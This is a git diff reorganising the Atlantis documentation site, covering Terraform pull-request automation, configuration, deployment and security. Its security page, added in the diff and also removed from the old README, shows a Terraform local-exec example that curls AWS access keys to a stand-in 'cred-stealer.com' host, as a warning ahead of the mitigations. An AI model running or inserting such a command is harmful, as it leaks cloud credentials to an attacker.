+    .description
+      max-width 35rem
+      font-size 1.6rem
+      line-height 1.3
+      color lighten($textColor, 40%)
+    .action-button
+      display inline-block
+      font-size 1.2rem
+      color #fff
+      background-color $accentColor
+      padding 0.8rem 1.6rem
+      border-radius 4px
+      transition background-color .1s ease
+      box-sizing border-box
+      border-bottom 1px solid darken($accentColor, 10%)
+      &:hover
+        background-color lighten($accentColor, 10%)
+  .features
+    border-top 1px solid $borderColor
+    padding 1.2rem 0
+    margin-top 2.5rem
+    display flex
+    flex-wrap wrap
+    align-items flex-start
+    align-content stretch
+    justify-content space-between
+  .feature
+    flex-grow 1
+    flex-basis 30%
+    max-width 30%
+    h2
+      font-size 1.4rem
+      font-weight 500
+      border-bottom none
+      padding-bottom 0
+      color lighten($textColor, 10%)
+    p
+      color lighten($textColor, 25%)
+  .footer
+    padding 2.5rem
+    border-top 1px solid $borderColor
+    text-align center
+    color lighten($textColor, 25%)
+@media (max-width: $MQMobile)
+  .home
+    .features
+      flex-direction column
+    .feature
+      max-width 100%
+      padding 0 2.5rem
+@media (max-width: $MQMobileNarrow)
+  .home
+    padding-left 1.5rem
+    padding-right 1.5rem
+    .hero
+      img
+        max-height 210px
+        margin 2rem auto 1.2rem
+      h1
+        font-size 2rem
+      h1, .description, .action
+        margin 1.2rem auto
+      .description
+        font-size 1.2rem
+      .action-button
+        font-size 1rem
+        padding 0.6rem 1.2rem
+    .feature
+      h2
+        font-size 1.25rem
+</style>
\ No newline at end of file
diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js
index 1b6bd0f4ae..3132b1c618 100644
--- a/runatlantis.io/.vuepress/config.js
+++ b/runatlantis.io/.vuepress/config.js
@@ -26,16 +26,26 @@ module.exports = {
     themeConfig: {
         nav: [
             {text: 'Home', link: '/'},
+            {text: 'Guide', link: '/guide/'},
             {text: 'Docs', link: '/docs/'},
             {text: 'Blog', link: 'https://medium.com/runatlantis'}
         ],
-        sidebar: [
-            '/docs/',
-            '/docs/pull-request-commands',
-            '/docs/deployment',
-            '/docs/faq',
-            '/docs/contributing',
-        ],
+        sidebar: {
+            '/docs/': [
+                '',
+                ['atlantis-yaml-reference', 'atlantis.yaml Reference'],
+                'pull-request-commands',
+                'deployment',
+                'security',
+                'faq',
+            ],
+            '/guide/': [
+                '',
+                'test-drive',
+                'getting-started',
+                'requirements'
+            ]
+        },
         repo: 'runatlantis/atlantis',
         docsDir: 'runatlantis.io',
         editLinks: true,
diff --git a/runatlantis.io/README.md b/runatlantis.io/README.md
index 0d9f017a4a..f2311c1917 100644
--- a/runatlantis.io/README.md
+++ b/runatlantis.io/README.md
@@ -1,16 +1,21 @@
 ---
-layout: Home
+layout: HomeCustom
 pageClass: home-custom
-home: true
 heroImage: /hero.png
 heroText: Atlantis
 actionText: Get Started →
-actionLink: /docs/
-features:
-- title: Collaborate
-  details: Run terraform plan and apply from GitHub/GitLab pull requests so everyone can review the output
-- title: Secure Your Credentials
-  details: No need to distribute credentials to your whole team. Developers can submit Terraform changes and run plan and apply directly from the pull request.
-- title: Lock Terraform States
-  details: Lock states until pull requests are merged to prevent concurrent modification and confusion.
+actionLink: /guide/
 ---
+
+## How it works
+* Deploy Atlantis internally. You don't have to give your cloud credentials to a third party.
+    * It runs as a golang binary or Docker container.
+* Add its URL to your GitHub or GitLab repository so it can receive webhooks.
+* When a Terraform pull request is opened, Atlantis runs `terraform plan` and comments
+with the output back to the pull request.
+    * The exact `terraform plan` command is configurable.
+    * This directory and Terraform workspace within the repository are now "Locked".
+    Other pull requests cannot `plan` against the same directory/workspace until the plan
+    is applied or deleted and the pull request is merged.
+* If the `plan` looks good, users can comment on the pull request `atlantis apply` to apply the plan.
+    * You can require pull request approval before running `apply` is allowed.
diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md
index 0762964107..28d32b9987 100644
--- a/runatlantis.io/docs/README.md
+++ b/runatlantis.io/docs/README.md
@@ -1,207 +1,7 @@
-# Atlantis
+# Overview
 
-## Walkthrough Video
-[![Atlantis Walkthrough](./images/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
 
-Read about [Why We Built Atlantis](https://medium.com/runatlantis/introducing-atlantis-6570d6de7281)
 
-[![CircleCI](https://circleci.com/gh/runatlantis/atlantis/tree/master.svg?style=shield)](https://circleci.com/gh/runatlantis/atlantis/tree/master)
-[![SuperDopeBadge](https://img.shields.io/badge/Hightower-extra%20dope-b9f2ff.svg)](https://twitter.com/kelseyhightower/status/893260922222813184)
-[![Slack Status](https://thawing-headland-22460.herokuapp.com/badge.svg)](https://thawing-headland-22460.herokuapp.com)
-[![Go Report Card](https://goreportcard.com/badge/github.com/runatlantis/atlantis)](https://goreportcard.com/report/github.com/runatlantis/atlantis)
-
-* [Features](#features)
-* [Atlantis Works With](#atlantis-works-with)
-* [Getting Started](#getting-started)
-* [Pull/Merge Request Commands](#pullmerge-request-commands)
-* [Project Structure](#project-structure)
-* [Workspaces/Environments](#workspacesenvironments)
-* [Terraform Versions](#terraform-versions)
-* [Project-Specific Customization](#project-specific-customization)
-* [Locking](#locking)
-* [Approvals](#approvals)
-* [Security](#security)
-* [Production-Ready Deployment](#production-ready-deployment)
-    * [Docker](#docker)
-    * [Kubernetes](#kubernetes)
-    * [AWS Fargate](#aws-fargate)
-* [Server Configuration](#server-configuration)
-* [AWS Credentials](#aws-credentials)
-* [Glossary](#glossary)
-    * [Project](#project)
-    * [Workspace/Environment](#workspaceenvironment)
-* [FAQ](#faq)
-* [Contributing](#contributing)
-* [Credits](#credits)
-
-## Features
-➜ Collaborate on Terraform with your team
-- Run terraform `plan` and `apply` **from GitHub pull requests** so everyone can review the output
-- **Lock workspaces** until pull requests are merged to prevent concurrent modification and confusion
-
-➜ Developers can write Terraform safely
-- **No need to distribute AWS credentials** to your whole team. Developers can submit Terraform changes and run `plan` and `apply` directly from the pull/merge request
-- Optionally, require a **review and approval** prior to running `apply`
-
-➜ Also
-- Support **multiple versions of Terraform** with a simple project config file
-
-## Atlantis Works With
-* GitHub (public, private or enterprise) and GitLab (public, private or enterprise)
-* Any Terraform version (see [Terraform Versions](#terraform-version))
-* Can be run with a [single binary](https://github.com/runatlantis/atlantis/releases) or with our [Docker image](https://hub.docker.com/r/runatlantis/atlantis/)
-* Any repository structure
-
-## Getting Started
-Download from [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
-
-Run
-```
-./atlantis testdrive
-```
-This mode sets up Atlantis on a test repo so you can try it out. It will
-- fork an example terraform project
-- install terraform (if not already in your PATH)
-- install ngrok so we can expose Atlantis to GitHub
-- start Atlantis
-
-If you're ready to permanently set up Atlantis see [Production-Ready Deployment](#production-ready-deployment).
-
-
-
-## Project Structure
-Atlantis supports several Terraform project structures:
-- a single Terraform project at the repo root
-```
-.
-├── main.tf
-└── ...
-```
--  multiple project folders in a single repo (monorepo)
-```
-.
-├── project1
-│   ├── main.tf
-|   └── ...
-└── project2
-    ├── main.tf
-    └── ...
-```
--  one folder per set of configuration
-```
-.
-├── staging
-│   ├── main.tf
-|   └── ...
-└── production
-    ├── main.tf
-    └── ...
-```
--  using `env/{env}.tfvars` to define workspace specific variables. This works in both multi-project repos and single-project repos.
-```
-.
-├── env
-│   ├── production.tfvars
-│   └── staging.tfvars
-└── main.tf
-```
-or
-```
-.
-├── project1
-│   ├── env
-│   │   ├── production.tfvars
-│   │   └── staging.tfvars
-│   └── main.tf
-└── project2
-    ├── env
-    │   ├── production.tfvars
-    │   └── staging.tfvars
-    └── main.tf
-```
-With the above project structure you can de-duplicate your Terraform code between workspaces/environments without requiring extensive use of modules. At Hootsuite we found this project format to be very successful and use it in all of our 100+ Terraform repositories.
-
-## Workspaces/Environments
-Terraform introduced [Workspaces](https://www.terraform.io/docs/state/workspaces.html) in 0.9. They allow for
-> a single directory of Terraform configuration to be used to manage multiple distinct sets of infrastructure resources
-
-If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through the `-w` flag.
-For example,
-```
-atlantis plan -w staging
-```
-
-If a workspace is specified, Atlantis will use `terraform workspace select {workspace}` prior to running `terraform plan` or `terraform apply`.
-
-If you're using the `env/{env}.tfvars` [project structure](#project-structure) we will also append `-var-file=env/{env}.tfvars` to `plan` and `apply`.
-
-If no workspace is specified, we'll use the `default` workspace by default.
-This replicates Terraform's default behaviour which also uses the `default` workspace.
-
-## Terraform Versions
-By default, Atlantis will use the `terraform` executable that is in its path. To use a specific version of Terraform just install that version on the server that Atlantis is running on.
-
-If you would like to use a different version of Terraform for some projects but not for others
-1. Install the desired version of Terraform into the `$PATH` of where Atlantis is running and name it `terraform{version}`, ex. `terraform0.8.8`.
-2. In the project root (which is not necessarily the repo root) of any project that needs a specific version, create an `atlantis.yaml` file as follows
-```
----
-terraform_version: 0.8.8 # set to desired version
-```
-
-So your project structure will look like
-```
-.
-├── main.tf
-└── atlantis.yaml
-```
-Now when Atlantis executes it will use the `terraform{version}` executable.
-
-## Project-Specific Customization
-An `atlantis.yaml` config file in your project root (which is not necessarily the repo root) can be used to customize
-- what commands Atlantis runs **before** `init`, `get`, `plan` and `apply` with `pre_init`, `pre_get`, `pre_plan` and `pre_apply`
-- what commands Atlantis runs **after** `plan` and `apply` with `post_plan` and `post_apply`
-- additional arguments to be supplied to specific terraform commands with `extra_arguments`
-    - the commmands that we support adding extra args to are `init`, `get`, `plan` and `apply`
-- what version of Terraform to use (see [Terraform Versions](#terraform-versions))
-
-The schema of the `atlantis.yaml` project config file is
-
-```yaml
-# atlantis.yaml
----
-terraform_version: 0.8.8 # optional version
-# pre_init commands are run when the Terraform version is >= 0.9.0
-pre_init:
-  commands:
-  - "curl http://example.com"
-# pre_get commands are run when the Terraform version is < 0.9.0
-pre_get:
-  commands:
-  - "curl http://example.com"
-pre_plan:
-  commands:
-  - "curl http://example.com"
-post_plan:
-  commands:
-  - "curl http://example.com"
-pre_apply:
-  commands:
-  - "curl http://example.com"
-post_apply:
-  commands:
-  - "curl http://example.com"
-extra_arguments:
-  - command_name: plan
-    arguments:
-    - "-var-file=terraform.tfvars"
-```
-
-When running the `pre_plan`, `post_plan`, `pre_apply`, and `post_apply` commands the following environment variables are available
-- `WORKSPACE`: if a workspace argument is supplied to `atlantis plan` or `atlantis apply`, ex `atlantis plan -w staging`, this will
-be the value of that argument. Else it will be `default`
-- `ATLANTIS_TERRAFORM_VERSION`: local version of `terraform` or the version from `terraform_version` if specified, ex. `0.8.8`
-- `DIR`: absolute path to the root of the project on disk
 
 ## Locking
 When `plan` is run, the [project](#project) and [workspace](#workspaceenvironment) (**but not the whole repo**) are **Locked** until an `apply` succeeds **and** the pull request/merge request is merged.
@@ -214,143 +14,6 @@ To unlock the project and workspace without completing an `apply` and merging, c
 at the bottom of the plan comment to discard the plan and delete the lock.
 Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request.
 
-## Approvals
-If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
-By default, no approval is required.
-
-For more information on GitHub pull request reviews and approvals see: https://help.github.com/articles/about-pull-request-reviews/
-
-For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html.
-
-## Security
-Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely.
-
-Atlantis could be exploited by
-* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html)
-```tf
-resource "null_resource" "null" {
-  provisioner "local-exec" {
-    command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
-  }
-}
-```
-* Running malicious hook commands specified in an `atlantis.yaml` file.
-* Someone adding `atlantis plan/apply` comments on your valid pull requests causing terraform to run when you don't want it to.
-
-### Mitigations
-#### Don't Use On Public Repos
-Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system.
-
-#### Don't Use `--allow-fork-prs`
-If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false)
-because anyone can open up a pull request from their fork to your repo.
-
-#### `--repo-whitelist`
-Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag.
-For example:
-* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
-* Your whole organization: `--repo-whitelist=github.com/runatlantis/*`
-* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*`
-* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
-
-This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
-
-#### Webhook Secrets
-Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables.
-Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted.
-Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
-
-
-## Server Configuration
-Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
-Config file values are overridden by environment variables which in turn are overridden by flags.
-
-### YAML
-To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
-The keys of your config file should be the same as the flag, ex.
-```yaml
----
-gh-token: ...
-log-level: ...
-```
-
-### Environment Variables
-All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`.
-For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
-
-To see a list of all flags and their descriptions run `atlantis server --help`
-
-## AWS Credentials
-Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
-As long as `terraform` works where you're hosting Atlantis, then Atlantis will work.
-See https://www.terraform.io/docs/providers/aws/#authentication for more detail.
-
-### Multiple AWS Accounts
-Atlantis supports multiple AWS accounts through the use of Terraform's
-[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
-
-If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
-you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
-
-If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
-you'll need to ensure that the credentials file has a `default` profile that is able
-to assume all required roles.
-
-[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
-won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
-Terraform with.
-
-### Assume Role Session Names
-Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
-the user that is running the Atlantis command. This can be used to dynamically name the assume role
-session. This is used at Hootsuite so AWS API actions can be correlated with a specific user.
-
-To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
-and use the `atlantis_user` terraform variable
-
-```hcl
-provider "aws" {
-  assume_role {
-    role_arn     = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
-    session_name = "${var.atlantis_user}"
-  }
-}
-
-# need to define the atlantis_user variable to avoid terraform errors
-variable "atlantis_user" {
-  default = "atlantis_user"
-}
-```
-
-If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
-make sure to add the `role_arn` option:
-
-```hcl
-terraform {
-  backend "s3" {
-    bucket   = "mybucket"
-    key      = "path/to/my/key"
-    region   = "us-east-1"
-    role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
-    # can't use var.atlantis_user as the session name because
-    # interpolations are not allowed in backend configuration
-    # session_name = "${var.atlantis_user}" WON'T WORK
-  }
-}
-```
-
-Terraform doesn't support interpolations in backend config so you will not be
-able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
-role is only used for state-related API actions. Any other API actions will be performed using
-the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
-
-## Glossary
-#### Project
-A Terraform project. Multiple projects can be in a single GitHub repo.
-We identify a project by its repo **and** the path to the root of the project within that repo.
-
-#### Workspace/Environment
-A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information.
 
 
 
diff --git a/runatlantis.io/docs/atlantis-yaml-reference.md b/runatlantis.io/docs/atlantis-yaml-reference.md
new file mode 100644
index 0000000000..63f36752ef
--- /dev/null
+++ b/runatlantis.io/docs/atlantis-yaml-reference.md
@@ -0,0 +1,45 @@
+# Customization
+An `atlantis.yaml` config file in your project root (which is not necessarily the repo root) can be used to customize
+- what commands Atlantis runs **before** `init`, `get`, `plan` and `apply` with `pre_init`, `pre_get`, `pre_plan` and `pre_apply`
+- what commands Atlantis runs **after** `plan` and `apply` with `post_plan` and `post_apply`
+- additional arguments to be supplied to specific terraform commands with `extra_arguments`
+    - the commmands that we support adding extra args to are `init`, `get`, `plan` and `apply`
+- what version of Terraform to use (see [Terraform Versions](#terraform-versions))
+
+The schema of the `atlantis.yaml` project config file is
+
+```yaml
+# atlantis.yaml
+---
+terraform_version: 0.8.8 # optional version
+# pre_init commands are run when the Terraform version is >= 0.9.0
+pre_init:
+  commands:
+  - "curl http://example.com"
+# pre_get commands are run when the Terraform version is < 0.9.0
+pre_get:
+  commands:
+  - "curl http://example.com"
+pre_plan:
+  commands:
+  - "curl http://example.com"
+post_plan:
+  commands:
+  - "curl http://example.com"
+pre_apply:
+  commands:
+  - "curl http://example.com"
+post_apply:
+  commands:
+  - "curl http://example.com"
+extra_arguments:
+  - command_name: plan
+    arguments:
+    - "-var-file=terraform.tfvars"
+```
+
+When running the `pre_plan`, `post_plan`, `pre_apply`, and `post_apply` commands the following environment variables are available
+- `WORKSPACE`: if a workspace argument is supplied to `atlantis plan` or `atlantis apply`, ex `atlantis plan -w staging`, this will
+be the value of that argument. Else it will be `default`
+- `ATLANTIS_TERRAFORM_VERSION`: local version of `terraform` or the version from `terraform_version` if specified, ex. `0.8.8`
+- `DIR`: absolute path to the root of the project on disk
\ No newline at end of file
diff --git a/runatlantis.io/docs/contributing.md b/runatlantis.io/docs/contributing.md
deleted file mode 100644
index 072886000c..0000000000
--- a/runatlantis.io/docs/contributing.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# Contributing
-Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md).
-
-## Credits
-Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues.
-
-NOTE: We had to remove the "fork" label because otherwise code searches don't work.
-
-Thank you to these awesome contributors!
-- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs)
-- [@nadavshatz](https://github.com/nadavshatz)
-- [@jwieringa](https://github.com/jwieringa)
-- [@suhussai](https://github.com/suhussai)
-- [@mootpt](https://github.com/mootpt)
-- [@codec](https://github.com/codec)
-- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs)
-- [@mpmsimo](https://github.com/mpmsimo)
-- [@hussfelt](https://github.com/hussfelt)
-- [@psalaberria002](https://github.com/psalaberria002)
-
-* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com
diff --git a/runatlantis.io/docs/deployment.md b/runatlantis.io/docs/deployment.md
index cc6e5b1e08..29ef623613 100644
--- a/runatlantis.io/docs/deployment.md
+++ b/runatlantis.io/docs/deployment.md
@@ -371,4 +371,96 @@ If you'd like to test out Atlantis before running it on your own repositories yo
 - Now you can test out Atlantis
 	- Create a comment `atlantis help` to see what commands you can run from the pull request
 	- `atlantis plan` will run `terraform plan` behind the scenes. You should see the output commented back on the pull request. You should also see some logs show up where you're running `atlantis server`
-	- `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do.
\ No newline at end of file
+	- `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do.
+
+
+## Server Configuration
+Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
+Config file values are overridden by environment variables which in turn are overridden by flags.
+
+### YAML
+To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
+The keys of your config file should be the same as the flag, ex.
+```yaml
+---
+gh-token: ...
+log-level: ...
+```
+
+### Environment Variables
+All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`.
+For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
+
+To see a list of all flags and their descriptions run `atlantis server --help`
+
+## AWS Credentials
+Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
+As long as `terraform` works where you're hosting Atlantis, then Atlantis will work.
+See https://www.terraform.io/docs/providers/aws/#authentication for more detail.
+
+### Multiple AWS Accounts
+Atlantis supports multiple AWS accounts through the use of Terraform's
+[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
+
+If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
+you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
+
+If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
+you'll need to ensure that the credentials file has a `default` profile that is able
+to assume all required roles.
+
+[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
+won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
+Terraform with.
+
+### Assume Role Session Names
+Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
+the user that is running the Atlantis command. This can be used to dynamically name the assume role
+session. This is used at Hootsuite so AWS API actions can be correlated with a specific user.
+
+To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
+and use the `atlantis_user` terraform variable
+
+```hcl
+provider "aws" {
+  assume_role {
+    role_arn     = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+    session_name = "${var.atlantis_user}"
+  }
+}
+
+# need to define the atlantis_user variable to avoid terraform errors
+variable "atlantis_user" {
+  default = "atlantis_user"
+}
+```
+
+If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
+make sure to add the `role_arn` option:
+
+```hcl
+terraform {
+  backend "s3" {
+    bucket   = "mybucket"
+    key      = "path/to/my/key"
+    region   = "us-east-1"
+    role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+    # can't use var.atlantis_user as the session name because
+    # interpolations are not allowed in backend configuration
+    # session_name = "${var.atlantis_user}" WON'T WORK
+  }
+}
+```
+
+Terraform doesn't support interpolations in backend config so you will not be
+able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
+role is only used for state-related API actions. Any other API actions will be performed using
+the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
+
+## Approvals
+If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
+By default, no approval is required.
+
+For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
+
+For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
diff --git a/runatlantis.io/docs/getting-started.md b/runatlantis.io/docs/getting-started.md
deleted file mode 100644
index e69de29bb2..0000000000
diff --git a/runatlantis.io/docs/pull-request-commands.md b/runatlantis.io/docs/pull-request-commands.md
index 1aed3d0c01..94dc8260f3 100644
--- a/runatlantis.io/docs/pull-request-commands.md
+++ b/runatlantis.io/docs/pull-request-commands.md
@@ -1,23 +1,33 @@
 # Pull Request Commands
-Atlantis currently supports three commands that can be run via pull request comments (or merge request comments on GitLab):
+Atlantis currently supports three commands that can be run via pull request comments:
+[[toc]]
 
+## atlantis help
 ![Help Command](./images/pr-comment-help.png)
-## `atlantis help`
-View help
+```bash
+atlantis help
+```
+**Explanation**: View help
 
 ---
+## atlantis plan
 ![Plan Command](./images/pr-comment-plan.png)
-## `atlantis plan [options] -- [terraform plan flags]`
-Runs `terraform plan` for the changes in this pull request.
+```bash
+atlantis plan [options] -- [terraform plan flags]
+```
+**Explanation**: Runs `terraform plan` on the pull request's branch. You may wish to re-run plan after Atlantis has already done
+so if you've changed some resources manually.
 
 Options:
-* `-d directory` Which directory to run plan in relative to root of repo. Use `.` for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.
+* `-d directory` Which directory to run plan in relative to root of repo. Use `.` for root. Defaults to root.
+    * Ex. `atlantis plan -d child/dir`
+* `-p project` Which project to run plan for. Refers to the name of the project configured in the repo's [`atlantis.yaml` file](/docs/atlantis-yaml-reference.html). Cannot be used at same time as `-d` or `-w` because the project defines this already.
 * `-w workspace` Switch to this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) before planning. Defaults to `default`. If not using Terraform workspaces you can ignore this.
 * `--verbose` Append Atlantis log to comment.
 
 Additional Terraform flags:
 
-If you need to run `terraform plan` with additional arguments, like `-target=resource` or `-var 'foo-bar'`
+If you need to run `terraform plan` with additional arguments, like `-target=resource` or `-var 'foo-bar'` or `-var-file myfile.tfvars`
 you can append them to the end of the comment after `--`, ex.
 ```
 atlantis plan -d dir -- -var 'foo=bar'
@@ -25,15 +35,23 @@ atlantis plan -d dir -- -var 'foo=bar'
 If you always need to append a certain flag, see [Project-Specific Customization](#project-specific-customization).
 
 ---
+## atlantis apply
 ![Apply Command](./images/pr-comment-apply.png)
-## `atlantis apply [options] -- [terraform apply flags]`
-Runs `terraform apply` for the plans that match the directory and workspace.
+```bash
+atlantis apply [options] -- [terraform apply flags]
+```
+**Explanation**: Runs `terraform apply` for the plan generated previously that matches the directory/project/workspace.
 
 Options:
-* `-d directory` Apply the plan for this directory, relative to root of repo. Use `.` for root. If not specified, will run apply against all plans created for this workspace.
+* `-d directory` Apply the plan for this directory, relative to root of repo. Use `.` for root. Defaults to root.
+* `-p project` Apply the plan for this project. Refers to the name of the project configured in the repo's [`atlantis.yaml` file](/docs/atlantis-yaml-reference.html). Cannot be used at same time as `-d` or `-w`.
 * `-w workspace` Apply the plan for this [Terraform workspace](https://www.terraform.io/images/state/workspaces.html). Defaults to `default`. If not using Terraform workspaces you can ignore this.
 * `--verbose` Append Atlantis log to comment.
 
 Additional Terraform flags:
 
-Same as with `atlantis plan`.
\ No newline at end of file
+Because Atlantis under the hood is running `terraform apply` on the planfile generated in the previous step, any Terraform options that would change the `plan` are ignored:
+* `-target=resource`
+* `-var 'foo=bar'`
+* `-var-file=myfile.tfvars`
+If you would like to specify these flags, do it while running `atlantis plan`.
diff --git a/runatlantis.io/docs/security.md b/runatlantis.io/docs/security.md
new file mode 100644
index 0000000000..6f66886b37
--- /dev/null
+++ b/runatlantis.io/docs/security.md
@@ -0,0 +1,37 @@
+# Security
+Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely.
+
+Atlantis could be exploited by
+* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html)
+```tf
+resource "null_resource" "null" {
+  provisioner "local-exec" {
+    command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+  }
+}
+```
+* Running malicious hook commands specified in an `atlantis.yaml` file.
+* Someone adding `atlantis plan/apply` comments on your valid pull requests causing terraform to run when you don't want it to.
+
+## Mitigations
+### Don't Use On Public Repos
+Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system.
+
+### Don't Use `--allow-fork-prs`
+If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false)
+because anyone can open up a pull request from their fork to your repo.
+
+### `--repo-whitelist`
+Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag.
+For example:
+* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+* Your whole organization: `--repo-whitelist=github.com/runatlantis/*`
+* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*`
+* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+
+This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+
+### Webhook Secrets
+Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables.
+Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted.
+Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
diff --git a/runatlantis.io/guide/README.md b/runatlantis.io/guide/README.md
new file mode 100644
index 0000000000..ac0ac2ef71
--- /dev/null
+++ b/runatlantis.io/guide/README.md
@@ -0,0 +1,58 @@
+# Introduction
+
+::: tip Looking for the docs?
+Go here: [www.runatlantis.io/docs](/docs/)
+:::
+
+## Overview
+Atlantis is an application for automating Terraform via pull requests. It is deployed
+as a standalone application into your infrastructure. No third-party has access to
+your credentials.
+
+Atlantis listens for GitHub or GitLab webhooks about Terraform pull requests. It
+then runs `terraform plan` and comments with the output back on the pull request.
+
+When you want to apply, comment `atlantis apply` on the pull request and Atlantis
+will run `terraform apply` and comment back with the output.
+
+Check out the video below to see it in action:
+
+[![Atlantis Walkthrough](./images/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
+
+## Try it out
